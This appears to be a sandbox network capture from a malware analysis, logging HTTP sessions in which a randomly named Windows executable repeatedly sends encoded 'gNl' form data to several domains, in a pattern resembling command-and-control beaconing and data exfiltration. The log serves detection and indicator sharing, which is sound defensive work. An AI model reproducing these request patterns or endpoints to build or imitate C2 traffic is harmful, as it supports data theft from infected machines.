                                               Jul 8, 2024 09:35:34.398853064 CEST | 453 | OUT | GET /g9bf/?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.mscuration.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Jul 8, 2024 09:35:34.889822960 CEST | 390 | IN | HTTP/1.1 200 OK
                                              Server: openresty
                                              Date: Mon, 08 Jul 2024 07:35:34 GMT
                                              Content-Type: text/html
                                              Content-Length: 250
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gNl=lSzW3nVeW6JfMGMA7uN/7lGGplX0heZbz7O+lPV3tkxu97wid/nYpvoiQET18CfdiTSEkQjNZYpiQysHYXobuoEXQaB6E6dp7KAEYXO0AOAuSkjWL8ZFyYk=&QdC=AFMh5N"}</script></head></html>


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               29 | 192.168.2.4 | 49771 | 38.47.226.116 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:40.869652033 CEST | 707 | OUT | POST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=67MHSa4brEtEgFDQb3SUlityv/F4itCXtl4YHsq4yRfHGsIm24EjzdkYLLAEgFWq7ye6v7J0j+0ByO8tETRSr5ifkhL2zcGINHI0bU6+cFyjF1BDsOCsRK2qo5o/0RbUdVKBn8NQJVJe7Mrfil7n42Zh3OQ+PK79/MLYxJ9m7GZoWtNZU8hpon++o4kBtRiFFA==
                                               Jul 8, 2024 09:35:41.787241936 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:41 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               30 | 192.168.2.4 | 49772 | 38.47.226.116 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:43.402555943 CEST | 727 | OUT | POST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=67MHSa4brEtEhkzQdUKUjCtxivF4oNCTtlkYHoyoxnvHBOAm35EjwdkYfbBMulWb7ySYv/J0j9IByMktEkFV65idpBL0usGINHI0bUvTcFqjFExDsvCjSK2t4Jo/wRbYdVK/n/J6JXxe7JHfsU7kz2Zjo+R0EKXz5sjJ5qN/mHZVaLcDFNA+6naN1/t1gSfMeDUIFoEta8E+sL4miGPl41k=
                                               Jul 8, 2024 09:35:44.298962116 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:44 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               31 | 192.168.2.4 | 49773 | 38.47.226.116 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:45.931587934 CEST | 10809 | OUT | POST /fykj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.wb515.com
                                              Origin: http://www.wb515.com
                                              Referer: http://www.wb515.com/fykj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Data Ascii: gNl=[TRUNCATED]
                                               Jul 8, 2024 09:35:46.904247999 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:46 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               32 | 192.168.2.4 | 49774 | 38.47.226.116 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:48.464453936 CEST | 448 | OUT | GET /fykj/?QdC=AFMh5N&gNl=35knRvMfoS1B/FjQR0nniARQj9EspOWzm24eQtGg/GuRPegg+KNm598AA4o0kC2C9Cini7tZg+0o0500Ok9c7JziiiuD4vC4eWhlbFnGTmqZG0oUv+qZGLo= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.wb515.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Jul 8, 2024 09:35:49.389127970 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Mon, 08 Jul 2024 07:35:49 GMT
                                              Content-Type: text/html
                                              Content-Length: 548
                                              Connection: close
                                               Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               33 | 192.168.2.4 | 49775 | 132.226.11.158 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:55.554614067 CEST | 716 | OUT | POST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=5rD3RAmno6v8Yy7W7GO0AIhKYBM/w/jQQfY+uv8bhv7tHL3b+0R26C+HT7Z13Yo4pbsBVxJj5NHpuKK0Guh6yREFbtFd/Gie8qH3CEd5fFxzFm3Nr27Tn+botNvZjncygcRjSyZ2aY2g5Ttd9c1jszDy8FsDK4DYzcAD6AqE4NRJkTpFwilpY9GJkKSpjTPxyA==


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               34 | 192.168.2.4 | 49776 | 132.226.11.158 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:35:58.089072943 CEST | 736 | OUT | POST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=5rD3RAmno6v8ZSLW9gG0CohJVRM/6fjUQfU+uu5EgcftHqHb/x922i+HcbZwoIoxpbh0V1Jj5NTpuK60HZV5zBEHC9Ff82ie8qH3CA9DfFpzEWnNrUTQ4ObrqNvZy3c2gcQASzFMaaOg5T9d8N1sizDwyltMHbbTroZf4G/l6uRpo14fhTE+K9i65NbduQy4pBy+xBv8qr1QvnMUBnMcTMk=


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               35 | 192.168.2.4 | 49777 | 132.226.11.158 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:36:00.624855042 CEST | 10818 | OUT | POST /w2w0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              Origin: http://www.hf7777hi.net
                                              Referer: http://www.hf7777hi.net/w2w0/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                               Data Ascii: gNl=[TRUNCATED]


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               36 | 192.168.2.4 | 49778 | 132.226.11.158 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:36:03.168662071 CEST | 451 | OUT | GET /w2w0/?gNl=0prXS1nuo7L4BRXFxH+6P5N8ZSQ81sbrd+caxMQkr8e3H5z/+yVS+HOiTMdRuolLjIsNRBtZ8MXFl+jKIOJJ6lQvMONrxVe4j9OmCVx+YV9WHy3pokjU6vI=&QdC=AFMh5N HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.hf7777hi.net
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36


                                               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                               37 | 192.168.2.4 | 49779 | 217.160.0.119 | 80 | 5764 | C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
                                               Timestamp | Bytes transferred | Direction | Data
                                               Jul 8, 2024 09:36:29.550105095 CEST | 725 | OUT | POST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Ascii: gNl=ubpPxEGjd5a4qJoxfRqSI6ACKI+KGXMx1cRO7BiJCd+ttscQlcnTLeSxGO4QhL6Vn4RUhIu333s3LKISdzZI9duC3dU/y0atcK0zvL6WzGJZ9/8JudAJYLoitRmvAAfZ/EpsztSQz/iJ9mVbymn5h1HC0VtLce5A58gEnXPKbq180PskuHHiZvrehadjAOjPHw==
                                               Jul 8, 2024 09:36:30.223695040 CEST | 572 | IN | HTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:30 GMT
                                              Server: Apache
                                              Content-Encoding: gzip


Session ID: 38  Source IP: 192.168.2.4  Source Port: 49780  Destination IP: 217.160.0.119  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:32.088742018 CEST  Bytes transferred: 745  Direction: OUT  Data: POST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 220
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 75 62 70 50 78 45 47 6a 64 35 61 34 71 70 34 78 54 58 69 53 5a 71 41 46 46 6f 2b 4b 4d 33 4d 31 31 62 5a 4f 37 41 6d 6e 43 76 71 74 75 4a 34 51 6d 64 6e 54 48 2b 53 78 4f 75 34 52 72 72 36 4b 6e 34 4e 63 68 4e 57 33 33 33 34 33 4c 49 67 53 64 45 6c 4a 79 74 75 63 36 39 55 78 78 45 61 74 63 4b 30 7a 76 4b 4b 77 7a 47 52 5a 39 72 34 4a 68 63 41 4b 52 72 6f 6a 39 42 6d 76 52 51 66 64 2f 45 70 53 7a 73 50 59 7a 38 61 4a 39 6d 46 62 78 33 6e 2b 72 31 48 41 36 31 73 5a 58 73 55 50 2b 64 45 4e 68 46 6a 78 63 37 70 4b 38 70 39 2b 2f 32 6d 31 4c 76 50 74 38 64 55 58 4e 4e 65 47 63 34 32 54 69 74 30 38 30 38 6f 6d 2b 34 55 70 39 67 7a 49 41 64 6f 3d
                                              Data Ascii: gNl=ubpPxEGjd5a4qp4xTXiSZqAFFo+KM3M11bZO7AmnCvqtuJ4QmdnTH+SxOu4Rrr6Kn4NchNW33343LIgSdElJytuc69UxxEatcK0zvKKwzGRZ9r4JhcAKRroj9BmvRQfd/EpSzsPYz8aJ9mFbx3n+r1HA61sZXsUP+dENhFjxc7pK8p9+/2m1LvPt8dUXNNeGc42Tit0808om+4Up9gzIAdo=
Timestamp: Jul 8, 2024 09:36:32.728183985 CEST  Bytes transferred: 572  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:32 GMT
                                              Server: Apache
                                              Content-Encoding: gzip
                                              Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                              Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


Session ID: 39  Source IP: 192.168.2.4  Source Port: 49781  Destination IP: 217.160.0.119  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:34.626574993 CEST  Bytes transferred: 10827  Direction: OUT  Data: POST /3rdj/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 10300
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              Origin: http://www.qrdinamicos.com
                                              Referer: http://www.qrdinamicos.com/3rdj/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                              Data Raw: 67 4e 6c 3d 75 62 70 50 78 45 47 6a 64 35 61 34 71 70 34 78 54 58 69 53 5a 71 41 46 46 6f 2b 4b 4d 33 4d 31 31 62 5a 4f 37 41 6d 6e 43 75 53 74 75 2f 6b 51 68 4b 62 54 47 2b 53 78 45 4f 34 55 72 72 37 51 6e 34 46 69 68 4d 71 64 33 30 41 33 4e 70 41 53 55 56 6c 4a 70 64 75 63 6d 4e 55 77 79 30 61 43 63 4b 6b 2f 76 4b 36 77 7a 47 52 5a 39 71 49 4a 6c 4e 41 4b 58 72 6f 69 74 52 6d 6f 41 41 66 6c 2f 41 38 70 7a 76 6a 49 7a 4e 36 4a 39 48 31 62 30 46 50 2b 70 56 48 65 35 31 74 63 58 73 5a 50 2b 64 5a 30 68 42 6a 62 63 37 4e 4b 2b 64 63 69 71 53 2b 38 59 63 2b 77 67 36 4d 78 4c 76 79 7a 55 35 6d 58 71 74 41 37 6d 38 34 4c 38 59 74 73 76 53 33 53 61 61 47 30 56 61 76 41 67 58 48 6f 61 65 45 6e 38 56 66 36 65 68 4f 49 63 35 2f 46 72 4c 5a 5a 50 66 44 34 77 36 51 4c 4d 62 31 39 74 6e 43 34 41 6a 67 4f 73 53 70 4e 42 71 57 48 68 6c 37 42 41 32 7a 76 5a 76 65 54 6f 68 44 4b 4b 79 5a 32 41 74 43 51 62 58 49 41 66 61 43 61 4f 74 38 4d 43 43 2f 39 58 4e 44 46 73 58 63 36 65 77 6c 78 2f 58 58 36 50 4f 6c 63 4a 68 [TRUNCATED]
Data Ascii: gNl=[TRUNCATED]
Timestamp: Jul 8, 2024 09:36:35.282764912 CEST  Bytes transferred: 572  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:35 GMT
                                              Server: Apache
                                              Content-Encoding: gzip
                                              Data Raw: 31 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6d 91 4d 4f c3 30 0c 86 ef fc 0a 13 ce 6d 56 c6 61 eb da 49 a3 ab 04 12 ac a8 2a 5f c7 d0 66 34 52 9a 94 d4 63 1b bf 9e 24 e3 5b 9c e2 38 af 9f d7 76 92 e3 65 91 55 8f 37 39 b4 d8 49 b8 b9 3d bf ba cc 80 04 94 de 8f 33 4a 97 d5 12 1e 2e aa eb 2b 88 c2 11 54 86 a9 41 a0 d0 8a 49 4a f3 15 39 22 2d 62 1f 53 ba dd 6e c3 ed 38 d4 e6 99 56 25 dd 39 56 e4 8a 3f c2 00 7f 54 86 0d 36 64 7e 94 78 43 c9 d4 73 4a b8 22 b0 eb 64 fc eb a6 86 f4 1f 7c 34 9d 4e 0f 54 cb 80 a4 e5 ac b1 27 24 28 50 72 17 41 6e 8c 36 70 36 3a 3b 76 79 fa f5 90 74 1c 19 d4 5a 21 57 98 12 e4 3b a4 ae 87 19 d4 2d 33 03 c7 74 83 eb 60 42 ec 26 b0 0f f8 cb 46 bc a6 24 3b c8 83 6a df 73 67 08 7f 28 4a 07 35 ab 5b fe bb ca a7 02 67 65 b4 f4 7d d2 8f 46 93 27 dd ec 61 c0 bd e4 29 59 5b 41 b0 66 9d 90 fb 98 19 c1 e4 ec 60 d1 46 9f 8a 5a 4b 6d e2 93 11 1b 9f 4e ea 99 d7 0f e2 8d c7 f6 37 78 77 50 43 5e 96 45 e9 e6 8d 61 51 66 17 97 77 05 ac 0a c8 57 59 b1 aa ca c5 b2 f0 5b 68 23 df 7c ff 09 fe 46 8d [TRUNCATED]
                                              Data Ascii: 181mMO0mVaI*_f4Rc$[8veU79I=3J.+TAIJ9"-bSn8V%9V?T6d~xCsJ"d|4NT'$(PrAn6p6:;vytZ!W;-3t`B&F$;jsg(J5[ge}F'a)Y[Af`FZKmN7xwPC^EaQfwWY[h#|F7JBMgaRYAih\l6r_9L~T0


Session ID: 40  Source IP: 192.168.2.4  Source Port: 49782  Destination IP: 217.160.0.119  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:37.170553923 CEST  Bytes transferred: 454  Direction: OUT  Data: GET /3rdj/?QdC=AFMh5N&gNl=jZBvy0udQ72nya4zXQbiXt45CoTcGWwSxfgakTq4JdzmmcUs/sbVPe6dK9wcjd2s4Il3pIOfxWomFNoQbEAT45u/xcgM8nK3ctQKu/SLrVpagLQNn/wFC6g= HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Language: en-US,en
                                              Connection: close
                                              Host: www.qrdinamicos.com
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
Timestamp: Jul 8, 2024 09:36:37.825562954 CEST  Bytes transferred: 740  Direction: IN  Data: HTTP/1.1 404 Not Found
                                              Content-Type: text/html
                                              Content-Length: 596
                                              Connection: close
                                              Date: Mon, 08 Jul 2024 07:36:37 GMT
                                              Server: Apache
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 21 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404! </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> ERROR 404: ARCHIVO NO ENCONTRADO </h1> <p style="font-size:0.8em;"> El documento solicitado no ha sido encontrado. </p> </body></html>


Session ID: 41  Source IP: 192.168.2.4  Source Port: 49783  Destination IP: 103.168.172.37  Destination Port: 80  PID: 5764  Process: C:\Program Files (x86)\pvpebMHFtOfoLpRmlJtDsAgNefyNWORdfeJSYcYMaxaO\DAGiwzvTYsMjq.exe
Timestamp: Jul 8, 2024 09:36:51.146475077 CEST  Bytes transferred: 716  Direction: OUT  Data: POST /blhi/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en
                                              Cache-Control: no-cache
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 200
                                              Connection: close
                                              Host: www.jleabres.com
                                              Origin: http://www.jleabres.com
                                              Referer: http://www.jleabres.com/blhi/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
